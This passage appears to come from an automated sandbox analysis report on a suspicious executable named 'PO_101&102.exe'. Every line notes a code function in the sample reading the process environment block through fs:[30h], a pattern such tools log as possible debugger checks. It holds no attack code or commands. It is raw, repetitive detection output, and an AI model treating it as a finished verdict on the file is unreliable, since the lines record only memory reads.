          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01090050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01090050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01132073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01141074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01079080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0110B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0110B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0110B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0110B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0110B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0110B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010758EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0113131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0107DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01148B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0107F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0107DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01081B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01081B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0112D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109EB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109EB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0113138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01145BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A53C5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_011223E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_011223E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_011223E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01088A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0113AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0113AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0107AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0107AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01093A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01075210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01075210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01075210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01075210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01131229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0113EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01079240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01079240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01079240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01079240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01104257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B5A69 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B5A69 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B5A69 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0112B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0112B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01148A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0108AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0108AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01148D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0113E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AF527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AF527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AF527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0107AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010FA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01083D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01123D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01097D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01098D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01098D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01098D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01098D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01098D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01072D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01072D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01072D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01072D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01072D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01132D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01132D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01132D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01132D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01132D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01132D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01132D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_011405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_011405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01128DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0108D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0108D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0113FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0113FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0113FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0113FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0114740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0114740D mov eax, dword ptr fs:[00000030h]
